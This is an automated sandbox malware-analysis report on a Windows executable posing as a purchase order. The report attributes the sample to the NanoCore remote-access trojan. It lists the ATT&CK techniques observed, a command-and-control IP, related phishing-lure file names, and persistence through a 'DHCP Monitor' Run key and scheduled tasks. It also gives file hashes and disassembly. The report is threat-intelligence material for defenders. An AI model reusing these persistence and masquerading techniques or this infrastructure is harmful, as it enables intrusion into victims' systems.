Valid Accounts	Scheduled Task/Job1	Windows Service3	Access Token Manipulation1	Masquerading2	Input Capture21	System Time Discovery1	Remote Services	Input Capture21	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Service Execution2	Scheduled Task/Job1	Windows Service3	Disable or Modify Tools1	LSASS Memory	Security Software Discovery3	Remote Desktop Protocol	Archive Collected Data11	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Application Shimming1	Process Injection112	Virtualization/Sandbox Evasion21	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Scheduled Task/Job1	Access Token Manipulation1	NTDS	Virtualization/Sandbox Evasion21	Distributed Component Object Model	Input Capture	Scheduled Transfer	Ingress Tool Transfer1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Application Shimming1	Process Injection112	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol11	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	System Information Discovery34	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Hidden Files and Directories1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Obfuscated Files or Information1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Software Packing11	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Link
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	1%	Virustotal	Browse
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	0%	Metadefender	Browse
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
2.2.MSBuild.exe.5cc0000.6.unpack	100%	Avira	TR/NanoCore.fadte		Download File
2.2.MSBuild.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
	0%	Avira URL Cloud	safe
185.140.53.8	11%	Virustotal		Browse
185.140.53.8	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
	true	Avira URL Cloud: safe	low
185.140.53.8	true	11%, Virustotal, Browse Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.140.53.8	unknown	Sweden		209623	DAVID_CRAIGGG	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	483496
Start date:	15.09.2021
Start time:	06:12:21
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	P0 (2021)-2790 new order.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@16/11@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 68% (good quality ratio 61.8%) Quality average: 80.4% Quality standard deviation: 31.6%
HCA Information:	Successful, ratio: 96% Number of executed functions: 394 Number of non-executed functions: 25
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 92.122.145.220, 23.35.236.56, 20.82.210.154, 40.112.88.60, 23.216.77.208, 23.216.77.209 Excluded domains from analysis (whitelisted): fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:13:22	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
06:13:24	API Interceptor	997x Sleep call for process: MSBuild.exe modified
06:13:25	Task Scheduler	Run new task: DHCP Monitor path: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe" s>$(Arg0)
06:13:25	Task Scheduler	Run new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.140.53.8	l8Bg3M4Obd.exe	Get hash	malicious	Browse
	MANILA LGU VACCINATION.exe	Get hash	malicious	Browse
	Memorandum.pdf.exe	Get hash	malicious	Browse
	Scan copy ref PDF.exe	Get hash	malicious	Browse
	CV CREDENTIALS.exe	Get hash	malicious	Browse
	WeASwOPOdNuVKbq.exe	Get hash	malicious	Browse
	Purchase order.exe	Get hash	malicious	Browse
	SWIFT GIHTLDOM00000003078.exe	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DAVID_CRAIGGG	HEIpSUdxRf.exe	Get hash	malicious	Browse	185.140.53.11
	SPT DRINGENDE BESTELLUNG _876453,pdf.exe	Get hash	malicious	Browse	91.193.75.133
	MAERSK ARRIVAL NOTICE.exe	Get hash	malicious	Browse	185.140.53.142
	MHHHG_9847654673T3RDNVAASGU.NET.exe	Get hash	malicious	Browse	185.140.53.9
	ordine 338390208,pdf.exe	Get hash	malicious	Browse	185.140.53.11
	Final Order.exe	Get hash	malicious	Browse	185.140.53.133
	SecuriteInfo.com.BackDoor.SpyBotNET.25.7070.exe	Get hash	malicious	Browse	185.140.53.9
	yu8jcWMYUw.exe	Get hash	malicious	Browse	185.140.53.76
	UK COVID UPDATES AND ENTITLEMENT.exe	Get hash	malicious	Browse	91.193.75.202
	TWM#U007e-04987474848GRRT.exe	Get hash	malicious	Browse	185.140.53.9
	BankSlip.exe	Get hash	malicious	Browse	185.140.53.226
	Bank-Slip.exe	Get hash	malicious	Browse	185.140.53.226
	HSBC -- Wire Transfer copy.exe	Get hash	malicious	Browse	91.193.75.173
	lol.exe	Get hash	malicious	Browse	185.140.53.216
	PO N. ordine 338390208B,pdf.exe	Get hash	malicious	Browse	185.140.53.11
	Confirma#U00e7#U00e3o do pedido _ Urgente,pdf.exe	Get hash	malicious	Browse	91.193.75.133
	Acil RFQ_AP65425652_032421.exe	Get hash	malicious	Browse	185.140.53.11
	Auftragsbest#U00e4tigung _ Dringend,pdf.exe	Get hash	malicious	Browse	91.193.75.133
	qkWaxZQ3dW.exe	Get hash	malicious	Browse	91.193.75.173
	HPEE IMAGES-SPECIFICATION ORDER - Copy.xlsm	Get hash	malicious	Browse	91.193.75.173

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	TNT AWB TRACKING DETAILS.exe	Get hash	malicious	Browse
	BankSlip.exe	Get hash	malicious	Browse
	PAYMENT ERROR.exe	Get hash	malicious	Browse
	DHL AWB TRACKING DETAILS.exe	Get hash	malicious	Browse
	DHL AWB TRACKING DETAILS.exe	Get hash	malicious	Browse
	PcgYFOwcNQ.exe	Get hash	malicious	Browse
	Invoice Fanpage Karma.bat.exe	Get hash	malicious	Browse
	zslaUKmBfr.exe	Get hash	malicious	Browse
	scanbankdoc210999796432225.bat.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Zusy.394472.4088.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.17748.exe	Get hash	malicious	Browse
	fnnEkbo4cW.exe	Get hash	malicious	Browse
	kAGA3XtSEaOxfvA.exe	Get hash	malicious	Browse
	PO 18-3081.exe	Get hash	malicious	Browse
	Order417.exe	Get hash	malicious	Browse
	PCT0002982765627827BC.exe	Get hash	malicious	Browse
	NO19800800.exe	Get hash	malicious	Browse
	NAO09009009.exe	Get hash	malicious	Browse
	SYT09009.exe	Get hash	malicious	Browse
	RFQEMFA.Elektrik.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.20894581699571
Encrypted:	false
SSDEEP:	768:NElGiBcBuiyFjUwF0wdP9/rJMDnRFRJfStGpwV3e3qtAcy:ilGBu7jjP9/tMDn9Jt+VO3GO
MD5:	88BBB7610152B48C2B3879473B17857E
SHA1:	0F6CF8DD66AA58CE31DA4E8AC0631600EF055636
SHA-256:	2C7ACC16D19D076D67E9F1F37984935899B79536C9AC6EEC8850C44D20F87616
SHA-512:	5BACDF6C190A76C2C6A9A3519936E08E898AC8A2B1384D60429DF850BE778860435BF9E5EB316517D2345A5AAE201F369863F7A242134253978BCB5B2179CA58
Malicious:	false
Antivirus:	Antivirus: Virustotal, Detection: 1%, Browse Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: TNT AWB TRACKING DETAILS.exe, Detection: malicious, Browse Filename: BankSlip.exe, Detection: malicious, Browse Filename: PAYMENT ERROR.exe, Detection: malicious, Browse Filename: DHL AWB TRACKING DETAILS.exe, Detection: malicious, Browse Filename: DHL AWB TRACKING DETAILS.exe, Detection: malicious, Browse Filename: PcgYFOwcNQ.exe, Detection: malicious, Browse Filename: Invoice Fanpage Karma.bat.exe, Detection: malicious, Browse Filename: zslaUKmBfr.exe, Detection: malicious, Browse Filename: scanbankdoc210999796432225.bat.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Variant.Zusy.394472.4088.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.AIDetect.malware1.17748.exe, Detection: malicious, Browse Filename: fnnEkbo4cW.exe, Detection: malicious, Browse Filename: kAGA3XtSEaOxfvA.exe, Detection: malicious, Browse Filename: PO 18-3081.exe, Detection: malicious, Browse Filename: Order417.exe, Detection: malicious, Browse Filename: PCT0002982765627827BC.exe, Detection: malicious, Browse Filename: NO19800800.exe, Detection: malicious, Browse Filename: NAO09009009.exe, Detection: malicious, Browse Filename: SYT09009.exe, Detection: malicious, Browse Filename: RFQEMFA.Elektrik.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....{Z.....................@........... ........@.. .......................@......99....@.....................................S.......`/................... ....................................................... ............... ..H............text....... ...................... ..`.rsrc...`/.......0..................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\MSBuild.exe.log Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	325
Entropy (8bit):	5.334380084018418
Encrypted:	false
SSDEEP:	6:Q3LadLCR22IAQykdL1tZbLsbFLIP12MUAvvro6ysGMFLIP12MUAvvrs:Q3LaJU20NaL1tZbgbe4MqJsGMe4M6
MD5:	65CE98936A67552310EFE2F0FF5BDF88
SHA1:	8133653A6B9A169C7496ADE315CED322CFC3613A
SHA-256:	682F7C55B1B6E189D17755F74959CD08762F91373203B3B982ACFFCADE2E871A
SHA-512:	2D00AC024267EC384720A400F6D0B4F7EDDF49FAF8AB3C9E6CBFBBAE90ECADACA9022B33E3E8EC92E4F57C7FC830299C8643235EB4AA7D8A6AFE9DD1775F57C3
Malicious:	false
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..2,"Microsoft.Build.Engine, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.Build.Framework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dhcpmon.exe.log Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	441
Entropy (8bit):	5.388715099859351
Encrypted:	false
SSDEEP:	12:Q3LaJU20NaL10U2+gYhD5itZbgbe4MqJsGMe4M6:MLF20NaL32+g2OH4xvn4j
MD5:	88F0104DB9A3F9BC4F0FC3805F571B0D
SHA1:	CDD4F34385792F0CCE0A844F4ABB447C25AB4E73
SHA-256:	F6C11D3D078ED73F2640DA510E68DEEAA5F14F79CAE2E23A254B4E37C7D0230F
SHA-512:	04B977F63CAB8DE20EA7EFA9D4299C2E625D92FA6D54CA03EECD9F322E978326B353824F23BEC0E712083BDE0DBC5CC4EE90922137106B096050CA46A166DF0E
Malicious:	false
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\527c933194f3a99a816d83c619a3e1d3\System.Xml.ni.dll",0..2,"Microsoft.Build.Engine, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.Build.Framework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Temp\tmp7C69.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	5.136963558289723
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mnc2xtn:cbk4oL600QydbQxIYODOLedq3ZLj
MD5:	AE766004C0D8792953BAFFFE8F6A2E3B
SHA1:	14B12F27543A401E2FE0AF8052E116CAB0032426
SHA-256:	1ABDD9B6A6B84E4BA1AF1282DC84CE276C59BA253F4C4AF05FEA498A4FD99540
SHA-512:	E530DA4A5D4336FC37838D0E93B5EB3804B9C489C71F6954A47FC81A4C655BB72EC493E109CF96E6E3617D7623AC80697AD3BBD5FFC6281BAFC8B34DCA5E6567
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Local\Temp\tmp8052.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1310
Entropy (8bit):	5.109425792877704
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
MD5:	5C2F41CFC6F988C859DA7D727AC2B62A
SHA1:	68999C85FC7E37BAB9216E0099836D40D4545C1C
SHA-256:	98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
SHA-512:	B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	data
Category:	dropped
Size (bytes):	2320
Entropy (8bit):	7.024371743172393
Encrypted:	false
SSDEEP:	48:Ik/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwh:flC0IlC0IlC0IlC0IlC0IlC0IlC0IlCr
MD5:	0FBED11864C03FDED0E70014DCF84578
SHA1:	453723D938A03252F705B0A104986FE4C5CA7056
SHA-256:	70F5E49EE3091777827ED661B63842061220C899A708860986E9AA1BD87C5004
SHA-512:	DB53E3F1D18171F1D86C1B9BBF6BBD07153FC3E561834A35834BC0CA1E034FEDCD83AAAE7EDF9262C4E175C3D2287B647F55282E49627EAAF587F43714204667
Malicious:	false
Preview:	Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	Non-ISO extended-ASCII text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:TIF8:i8
MD5:	EFCA6CC477D60399732B834743979140
SHA1:	FD4A75B0CFD84A9FE784E6C9E2ACD1A3CF235F52
SHA-256:	3AE30778C66035457B34DF8B5A96CAE81968B115B46EC5CBFCE442235E0268DD
SHA-512:	408636EFBD4BAA30CD78AD0F450ADD2D8937D6F0FDD49DA8D7F105279E148017F472371E954F3A0F9CCA59DB18EBBB82F1758F05E6312EFEAECA51212DEF6976
Malicious:	true
Preview:	M+..Jx.H

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.85263908467479
Encrypted:	false
SSDEEP:	3:oMty8WbSI1u:oMLWuI1u
MD5:	A35128E4E28B27328F70E4E8FF482443
SHA1:	B89066B2F8DB34299AABFD7ABEE402D5444DD079
SHA-256:	88AEA00733DC4B570A29D56A423CC5BF163E5ACE7AF349972EB0BBA8D9AD06E1
SHA-512:	F098E844B5373B34642B49B6E0F2E15CFDAA1A8B6CABC2196CEC0F3765289E5B1FD4AB588DD65F97C8E51FA9A81077621E9A06946859F296904C646906A70F33
Malicious:	false
Preview:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

\Device\ConDrv Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	306
Entropy (8bit):	4.969261552825097
Encrypted:	false
SSDEEP:	6:zx3M1tlAX8bSWR30qysGMQbSVRRZBXVRbJ0fFdCsq2UTiMdH8stCal+n:zK1XnV30ZsGMIG9BFRbQdCT2UftCM+
MD5:	F227448515085A647910907084E6728E
SHA1:	5FA1A8E28B084DA25A1BBC51A2D75810CEF57E2C
SHA-256:	662BA47D628FE8EBE95DD47B4482110A10B49AED09387BC0E028BB66E68E20BD
SHA-512:	6F6E5DFFF7B17C304FB19B0BA5466AF84EF98A5C2EFA573AF72CFD3ED6964E9FD7F8E4B79FCFFBEF87CE545418C69D4984F4DD60BBF457D0A3640950F8FC5AF0
Malicious:	false
Preview:	Microsoft (R) Build Engine Version 2.0.50727.8922..[Microsoft .NET Framework, Version 2.0.50727.8922]..Copyright (C) Microsoft Corporation 2005. All rights reserved.....MSBUILD : error MSB1003: Specify a project or solution file. The current working directory does not contain a project or solution file...

Static File Info

General
File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.650091855564988
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	P0 (2021)-2790 new order.exe
File size:	349184
MD5:	394ff651c9fa2bfca16c32fb117514e1
SHA1:	e9ae9e9c2985aaa1c96c7186f9147eebddb7b203
SHA256:	25cc795662dc5f48d3e7dc1fcab5add2deed04887f7cfef18d1d4a3d7abf5ee7
SHA512:	d2d78bbf59d3023e219f24f7291b68a7dae9fe414812debfcc669572c392e00b232b80e94ba90fad797ae98d7ac402301cb9f46143b0e618207faefd5a1457e1
SSDEEP:	6144:tVQdPFh9YpnPSh80181yMJvS9Q4swk/qRdEt92V:c9T9W6h87P41kkdEzW
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u.....................................................................................Rich............................PE..L..

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x402abf
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61411185 [Tue Sep 14 21:17:57 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	337cc3ba01595b56bed66bb7d8f07a5a

Entrypoint Preview

Instruction
call 00007FE274D49C4Dh
jmp 00007FE274D4867Ah
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov eax, dword ptr [eax]
cmp dword ptr [eax], E06D7363h
jne 00007FE274D48867h
cmp dword ptr [eax+10h], 03h
jne 00007FE274D48861h
mov eax, dword ptr [eax+14h]
cmp eax, 19930520h
je 00007FE274D4885Dh
cmp eax, 19930521h
je 00007FE274D48856h
cmp eax, 19930522h
je 00007FE274D4884Fh
cmp eax, 01994000h
je 00007FE274D48848h
xor eax, eax
pop ebp
retn 0004h
call 00007FE274D49FB8h
int3
push 00402AC9h
call 00007FE274D4A604h
pop ecx
xor eax, eax
ret
push ebp
mov ebp, esp
push esi
call 00007FE274D48B7Eh
mov esi, eax
test esi, esi
je 00007FE274D4898Bh
mov edx, dword ptr [esi+5Ch]
mov ecx, edx
push edi
mov edi, dword ptr [ebp+08h]
cmp dword ptr [ecx], edi
je 00007FE274D4884Fh
add ecx, 0Ch
lea eax, dword ptr [edx+00000090h]
cmp ecx, eax
jc 00007FE274D48831h
lea eax, dword ptr [edx+00000090h]
cmp ecx, eax
jnc 00007FE274D48846h
cmp dword ptr [ecx], edi
je 00007FE274D48844h
xor ecx, ecx
test ecx, ecx
je 00007FE274D48956h
mov edx, dword ptr [ecx+08h]
test edx, edx
je 00007FE274D4894Bh
cmp edx, 05h
jne 00007FE274D4884Eh
and dword ptr [ecx+08h], 00000000h
xor eax, eax
inc eax
jmp 00007FE274D4893Bh
cmp edx, 01h
jne 00007FE274D4884Ah
or eax, FFFFFFFFh
jmp 00007FE274D4892Eh

Rich Headers

Programming Language:

[C++] VS2013 build 21005
[ASM] VS2013 build 21005
[ C ] VS2013 build 21005

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1e46c	0xdc	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24000	0x345e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x59000	0x13c8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1dd54	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1dd70	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x19000	0x1fc	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
